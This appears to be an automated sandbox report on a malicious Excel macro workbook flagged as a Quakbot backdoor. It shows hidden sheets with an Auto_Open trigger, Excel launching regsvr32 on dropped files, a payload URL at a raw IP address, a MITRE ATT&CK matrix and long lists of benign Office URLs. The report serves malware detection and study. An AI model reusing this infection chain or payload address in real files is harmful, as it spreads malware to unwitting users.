Source: Document image extraction number: 0Screenshot OCR: Enable Editing from the yellow bar above. PROTECTED VIEW Be careful-files from the Internet can
Source: Document image extraction number: 0Screenshot OCR: Enable Content
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Permission-40776837-06252021.xlsmInitial sample: EXEC
Source: workbook.xmlBinary string: "/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="C:\Users\Admin\Desktop\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{89C0748D-BB39-4A32-8068-C0C630B753E6}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="29040" windowHeight="15990" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet1" sheetId="1" r:id="rId1"/><sheet name="Sheet" sheetId="2" state="hidden" r:id="rId2"/><sheet name="Sheet4" sheetId="4" state="hidden" r:id="rId3"/><sheet name="Sheet2" sheetId="3" state="hidden" r:id="rId4"/></sheets><definedNames><definedName hidden="1" name="_xlnm.Auto_Open">Sheet!$G$1</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: classification engineClassification label: mal64.expl.evad.winXLSM@7/8@0/3
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{6766231E-E434-4153-BE81-13F76F647B8B} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\Kro.fis
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\Kro.fis1
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\Kro.fis2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\Kro.fisJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\Kro.fis1Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 ..\Kro.fis2Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Permission-40776837-06252021.xlsmInitial sample: OLE zip file path = xl/media/image1.jpg
Source: Permission-40776837-06252021.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: Permission-40776837-06252021.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: regsvr32.exe, 00000009.00000002.285842017.0000000000620000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.279371768.0000000000B10000.00000002.00000001.sdmp, regsvr32.exe, 0000000C.00000002.273563927.0000000000CA0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: regsvr32.exe, 00000009.00000002.285842017.0000000000620000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.279371768.0000000000B10000.00000002.00000001.sdmp, regsvr32.exe, 0000000C.00000002.273563927.0000000000CA0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: regsvr32.exe, 00000009.00000002.285842017.0000000000620000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.279371768.0000000000B10000.00000002.00000001.sdmp, regsvr32.exe, 0000000C.00000002.273563927.0000000000CA0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: regsvr32.exe, 00000009.00000002.285842017.0000000000620000.00000002.00000001.sdmp, regsvr32.exe, 0000000B.00000002.279371768.0000000000B10000.00000002.00000001.sdmp, regsvr32.exe, 0000000C.00000002.273563927.0000000000CA0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting11DLL Side-Loading1Process Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution22Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting11NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Permission-40776837-06252021.xlsm5%VirustotalBrowse
Permission-40776837-06252021.xlsm4%ReversingLabsDocument-Office.Backdoor.Quakbot

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://185.183.99.120/44372.78513125.dat0%Avira URL Cloudsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%VirustotalBrowse
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%VirustotalBrowse
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://185.183.99.120/44372.78513125.datfalse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.com98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
    high
    https://login.microsoftonline.com/98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
      high
      https://shell.suite.office.com:144398DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
          high
          https://autodiscover-s.outlook.com/98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
              high
              https://cdn.entity.98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkey98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                    high
                    https://powerlift.acompli.net98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v198DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                      high
                      https://cortana.ai98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                high
                                https://api.aadrm.com/98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                      high
                                      https://cr.office.com98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControl98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                          high
                                          https://graph.ppe.windows.net98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                            high
                                            https://res.getmicrosoftkey.com/api/redemptionevents98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://powerlift-frontdesk.acompli.net98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://tasks.office.com98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                              high
                                              https://officeci.azurewebsites.net/api/98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                              • 0%, Virustotal, Browse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://sr.outlook.office.net/ws/speech/recognize/assistant/work98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                high
                                                https://store.office.cn/addinstemplate98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                https://outlook.office.com/autosuggest/api/v1/init?cvid=98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                  high
                                                  https://globaldisco.crm.dynamics.com98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                    high
                                                    https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                      high
                                                      https://store.officeppe.com/addinstemplate98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://dev0-api.acompli.net/autodetect98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://www.odwebp.svc.ms98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://api.powerbi.com/v1.0/myorg/groups98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                        high
                                                        https://web.microsoftstream.com/video/98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                          high
                                                          https://graph.windows.net98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                            high
                                                            https://dataservice.o365filtering.com/98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://officesetup.getmicrosoftkey.com98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://analysis.windows.net/powerbi/api98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                              high
                                                              https://prod-global-autodetect.acompli.net/autodetect98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
